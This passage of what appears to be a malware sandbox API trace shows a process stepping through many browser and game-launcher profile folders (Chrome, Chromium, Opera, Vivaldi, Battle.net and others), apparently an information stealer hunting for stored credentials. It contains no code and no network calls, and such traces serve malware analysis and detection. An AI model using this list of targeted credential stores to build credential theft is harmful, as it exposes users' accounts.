lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9c03d9b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9c03d9b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693090 [0267.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0267.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0267.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0267.287] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer", lpFilePart=0x0) returned 0x31 [0267.355] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.355] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Battle.net", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net") returned 0x2f [0267.355] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net", lpFilePart=0x0) returned 0x2e [0267.355] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net\\", lpFilePart=0x0) returned 0x2f [0267.355] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Battle.net\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\battle.net\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.358] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.358] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data") returned 0x37 [0267.358] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x36 [0267.358] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\", lpFilePart=0x0) returned 0x37 [0267.359] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.361] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.361] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3c [0267.361] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x3b [0267.361] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\", lpFilePart=0x0) returned 0x3c [0267.361] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.364] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.364] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data") returned 0x41 [0267.364] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpFilePart=0x0) returned 0x40 [0267.364] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\", lpFilePart=0x0) returned 0x41 [0267.364] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google(x86)\\chrome\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.367] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.367] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\") returned 0x36 [0267.367] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x35 [0267.367] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x35 [0267.367] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\opera software\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.369] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.369] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data") returned 0x45 [0267.370] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x44 [0267.370] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\", lpFilePart=0x0) returned 0x45 [0267.370] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maplestudio\\chromeplus\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.372] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.372] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data") returned 0x36 [0267.372] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x35 [0267.372] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\", lpFilePart=0x0) returned 0x36 [0267.372] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iridium\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.374] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.375] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data") returned 0x3a [0267.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.375] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x39 [0267.375] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\", lpFilePart=0x0) returned 0x3a [0267.375] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\7star\\7star\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.377] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.377] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data") returned 0x3a [0267.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.377] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x39 [0267.377] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\", lpFilePart=0x0) returned 0x3a [0267.377] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.379] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.379] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data") returned 0x35 [0267.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.380] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x34 [0267.380] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\", lpFilePart=0x0) returned 0x35 [0267.380] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chedot\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.382] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.382] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data") returned 0x36 [0267.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.382] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x35 [0267.382] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\", lpFilePart=0x0) returned 0x36 [0267.382] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.384] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.384] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data") returned 0x35 [0267.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.385] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x34 [0267.385] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\", lpFilePart=0x0) returned 0x35 [0267.385] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data\\*"), lpFindFileData=0x19eedc | out: lpFindFileData=0x19eedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0267.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0267.387] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0267.388] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", lpDst=0x19f118, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data") returned 0x3f [0267.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b4) returned 1 [0267.388] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3e [0267.389] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\", 